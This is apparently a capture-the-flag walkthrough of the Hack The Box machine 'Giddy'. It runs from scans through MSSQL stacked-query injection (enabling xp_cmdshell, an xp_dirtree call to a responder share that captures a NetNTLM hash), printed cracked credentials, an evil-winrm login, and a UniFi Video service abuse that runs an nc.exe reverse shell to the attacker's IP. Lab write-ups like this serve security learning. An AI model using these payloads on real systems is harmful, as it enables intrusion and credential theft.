Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-23 23:28 IST
Nmap scan report for 10.10.10.104
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2024-02-23T17:58:31+00:00; -1s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-23T17:58:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-02-22T17:56:46
|_Not valid after: 2024-08-23T17:56:46
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds
PORT 80...
➜ Giddy gobuster dir -u http://10.10.10.104 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.104
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 157] [--> http://10.10.10.104/aspnet_client/]
/. (Status: 200) [Size: 700]
/remote (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fremote]
/Remote (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fRemote]
/Aspnet_client (Status: 301) [Size: 157] [--> http://10.10.10.104/Aspnet_client/]
/mvc (Status: 301) [Size: 147] [--> http://10.10.10.104/mvc/]
/remote
/mvc
Testing for sqli
Running sqlmap dumped the database but I did not get anything.
I ll use xp_cmdshell to make the target reach to my responder session where I ll steal its NetNTLM hash
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
?ProductSubCategoryId=27;EXEC xp_cmdshell 'net user';--
?ProductSubCategoryId=27;EXEC sp_configure 'show advanced options', 1;--
?ProductSubCategoryId=12;RECONFIGURE;--
?ProductSubCategoryId=12;EXEC sp_configure 'xp_cmdshell', 1;
?ProductSubCategoryId=12;RECONFIGURE;--
Turn on responder
sudo responder -I tun0
?ProductSubCategoryId=1; use master; exec xp_dirtree '\\10.10.14.29\SHARE';--;
Stacy::GIDDY:8ab6efdb18cb541b:C04385B1987ABF986B5B7F599B4B20BA:010100000000000000B64C9C1867DA0194571CF13C788A550000000002000800480051004500490001001E00570049004E002D005400360037003700390049004F00590032005900580004003400570049004E002D005400360037003700390049004F0059003200590058002E0048005100450049002E004C004F00430041004C000300140048005100450049002E004C004F00430041004C000500140048005100450049002E004C004F00430041004C000700080000B64C9C1867DA0106000400020000000800300030000000000000000000000000300000B043FB840BFEA2CF53ED8BC54B56F3559114BC2A104323A13435CCDAC6FD6FB00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003900000000000000000000000000
cracking the hash with hashcat
stacy:xNnWo6272k7x
I ll try to login with evil winrm using these creds
evil-winrm -u stacy -p 'xNnWo6272k7x' -i 10.10.10.104
It works
unifivideo can be a hint for privesc.
unifi video hash an exploit on exploitdb
https://www.exploit-db.com/exploits/43390
I created a reverse shell with msfvenom but it did not worked because of firewall, I have to bypass it.
I ll get the powershell history file
C:\programdata\unifi-video> (Get-PSReadLineOption).HistorySavePath
C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ServerRemoteHost_history.txt
*Evil-WinRM* PS C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> type ConsoleHost_history.txt
net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice
whoami
Get-Service -ServiceName UniFiVideoService
I was not able to use msfvenom reverseshell I ll try to make an executable that reads root.txt and copies to my Desktop
hello.c ->
#include <stdlib.h>
int main()
{
system("type C:\\users\\Administrator\\Desktop\\root.txt > C:\\users\\stacy\\Desktop\\hello.txt");
return 0;
}
compile it to exe ->
i686-w64-mingw32-gcc -o taskkill.exe hello.c
Copy it to target using curl
Stop the serviceStop-Service "Ubiquiti UniFi Video" -Force
Without getting root shell I won't get peace, I need peace.
I uploaded nc.exe to the target box in C:/windows/tasks/nc.exe and updated the c script to execute the nc.exe and give us a shell
hello.c
#include <stdlib.h>
int main() {
system("C:/windows/tasks/nc.exe -e cmd.exe 10.10.14.29 9001");
return 0;
}
i686-w64-mingw32-gcc -o taskkill.exe hello.c
copied the exe to target
curl http://10.10.14.29/taskkill.exe -o taskkill.exe
Stop-Service "Ubiquiti UniFi Video" -Force
Root